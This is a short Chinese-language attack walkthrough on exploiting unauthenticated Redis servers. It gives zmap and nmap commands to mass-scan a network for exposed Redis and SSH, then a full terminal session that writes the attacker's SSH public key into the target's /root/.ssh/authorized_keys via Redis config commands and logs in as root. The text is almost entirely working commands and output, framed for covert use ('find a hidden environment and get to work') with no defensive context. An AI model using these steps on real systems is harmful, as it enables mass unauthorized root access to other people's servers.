Redis 未受權訪問漏洞利用

先上 zmap 這個大殺器大範圍找安裝 redis 服務的機器，aaa.bbb.0.0 是計劃掃描的網絡。

$ zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results.csv

而後根據 results.csv 的結果來逐個排查，注意要能 ssh 登陸的。

$ cat results.csv | xargs nmap -p 22

最後找一個隱蔽環境，開始幹活，aaa.bbb.ccc.ddd 是目標地址：

root@ab871b39330f:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
f8:d1:b2:bc:d9:13:13:3d:de:6d:6e:27:bf:28:28:72 root@ab871b39330f
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|                 |
|           .     |
|       . .. o    |
|      . S .o o . |
|       o +o . . o|
|        + .o   o |
|     . E =..  o +|
|      o + .... =+|
+-----------------+
root@ab871b39330f:~# (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") | redis-cli -h aaa.bbb.ccc.ddd -x set crackit
OK
root@ab871b39330f:~# redis-cli -h aaa.bbb.ccc.ddd
aaa.bbb.ccc.ddd:6379> config set dir /root/.ssh/
OK
aaa.bbb.ccc.ddd:6379> config get dir
1) "dir"
2) "/root/.ssh"
aaa.bbb.ccc.ddd:6379> config set dbfilename "authorized_keys"
OK
aaa.bbb.ccc.ddd:6379> save
OK
aaa.bbb.ccc.ddd:6379> exit
root@ab871b39330f:~# ssh root@aaa.bbb.ccc.ddd
The authenticity of host 'aaa.bbb.ccc.ddd (aaa.bbb.ccc.ddd)' can't be established.
RSA key fingerprint is 0c:9d:60:e6:24:51:07:4d:93:0f:f3:4e:cb:12:ae:43.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'aaa.bbb.ccc.ddd' (RSA) to the list of known hosts.
Last login: Tue Sep 29 15:20:10 2015 from 202.115.16.136
[root@mscopyright1 ~]# pwd
/root